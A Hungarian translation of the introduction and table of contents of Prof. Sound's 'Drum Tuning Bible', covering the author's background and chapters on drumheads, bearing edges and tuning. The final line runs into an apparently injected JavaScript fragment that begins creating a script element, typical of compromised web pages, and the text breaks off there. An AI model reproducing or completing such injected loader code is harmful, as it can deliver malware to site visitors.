A Dobhangolás Bibliája bevezető

Írta: Prof. Sound

Ferdítés: Szilágyi Levente

 

Ferdítő megjegyzése: A méreteket szöveghűen inch-ben adtam meg: 1 inch = hüvelyk, ami 2,54 cm. A márkaneveket az eredeti leírásból többnyire egy az egyben emeltem át.

A Prof. Sound néven ismert, jelenleg 45 éves Scott Johnson 13 évesen kezdett el dobolni és 17 évesen már saját stúdiót üzemeltetett. Érdeklődése elsősorban a Rock, a progresszív rock és a Country zene felé irányult. Bla bla bla…(itt az életéről és a zenei ízléséről beszél; a szöveg szempontjából nem igazán fontos)

Elöljáróban: A dob egy olyan akusztikus hangszer, amelynek szinte egyáltalán nincsenek határai a típus, a hangzás és a kifejezőerő tekintetében. Az alább olvasható szöveg a saját tapasztalataimat foglalja össze a dobokkal és hangolásukkal kapcsolatban. Ezek a tapasztalatok nagyjából 30 év alatt gyűltek össze különböző hangmérnökök és zenészek jóvoltából. A szövegben szereplő termékek és márkanevek a gyártók jóváhagyása nélkül szerepelnek, és nem azért kerülnek említésre, hogy bárkit eltántorítsanak bármely más hangszer használatától. Épp ellenkezőleg; arra akarok buzdítani vele mindenkit, hogy annyi és annyiféle hangszerrel kísérletezzen, amennyivel csak tud. Ha valamelyik termék nem került említésre, az nem azért van, mert az valamilyen szempontból nem lenne megfelelő, vagy nem ajánlom megvételre. Bármilyen szinten is foglalkoztam, vagy dolgoztam hangokkal, mindig arra az örök igazságra jutottam, hogy, hogy mindannyian máshogy hallunk. Más szóval, ami valaki számára a megfelelő eredmény, nem biztos, hogy számomra is azt jelenti. Bár megpróbáltam demisztifikálni a dobhangolás művészetét és a megfelelő dob kiválasztásának módszerét, nem garantálhatok semmit. Az alább olvasható szöveg legyen szórakoztató és tanulságos az olvasó számára a kívánt eredmények eléréséhez vezető úton.

 

Tartalomjegyzék

Mi motiválta a Dobhangolás bibliájának létrejöttét

Előszó

Néhány tény a dobbal kapcsolatban

A hangolás alapjai

A dob felépítésének irányelvei, minden dob esetében

Bearing edges – karima / káva ágy / a dobtest pereme

A dobtest magasságának/mélységének és az átmérőjének összefüggései

A kávákról (hoops/rims)

A bőrfeszítő babák és a zenei hangnemek összefüggései

Mikor cseréljük ki egy dobbőrt?

A bőrök elhelyezése és behangolása, minden dob esetében

Az alsó bőr hangolása – A kezdetek

A felső bőr hangolása

Hangolási zónák

 

Mi motiválta a Dobhangolás bibliájának létrejöttét

Az hogy valaki hangszerként képes használni egy dobot nem jelenti azt, hogy műszakilag is jól ismeri. Ahhoz hogy egy dobot behangoljunk, egyáltalán nem kell értenünk a doboláshoz. Attól még hogy esetleg zeneileg profi valaki nem feltétlenül tudja átadni a tudását úgy ahogy szeretné. Én úgy éreztem ez megy nekem – a magam módján. Bár én sem tudok mindent, de mivel egy ideje már benne vagyok a szakmában, és sok téves információval találkoztam profi és amatőr szinten egyaránt, úgy éreztem, pontos és érthető információval szolgálhatok a dob műszaki vonatkozásaiban. A Dobhangolás bibliája azért készült, hogy minden érdeklődő számára ingyen elérhető és átfogó információval szolgáljon.

Ilyen és ezekhez hasonló témákat tárgyalunk a dob-biblia különböző fejezeteiben:

* A bőrök közötti különbség, mikor mit használjunk.

* Hogyan tehetjük a dobot rezonánssá, telt, átütő, nyílt hangzásúvá, hogyan állíthatjuk be, hogy jobban, vagy kevésbé csengjen.

* Hogyan befolyásolják a mikrofonok a megfelelő bőr kiválasztását.

* A dob alapvető hangja a hangnemmel és a hangszínnel szemben.

* Hogyan befolyásolja a dob anyaga és felépítése a hangolását és az összhangzását.

* Példák a bőrök felhelyezésére és az így elért eredmények.

* Pergő-kereszthúr zizegés, vagy szimpatikus vibrálás.

* Cseréljünk húrt -a feszesség és a megfelelő típus kiválasztásának kérdései.

* Hogyan érjünk el kifejezőbb hangzást, nagyobb hangerőt, csattanást, érzékenységet és melegebb hangot egy pergő dob esetében.

* Példák hangolási szekvenciákra, és hangjegyekre hangolásra.

* Lábdob tompítás és a bőr kiválasztása.

* Kávák

* Karima / káva ágyvar d=document;var s=d.createElement(‘script’);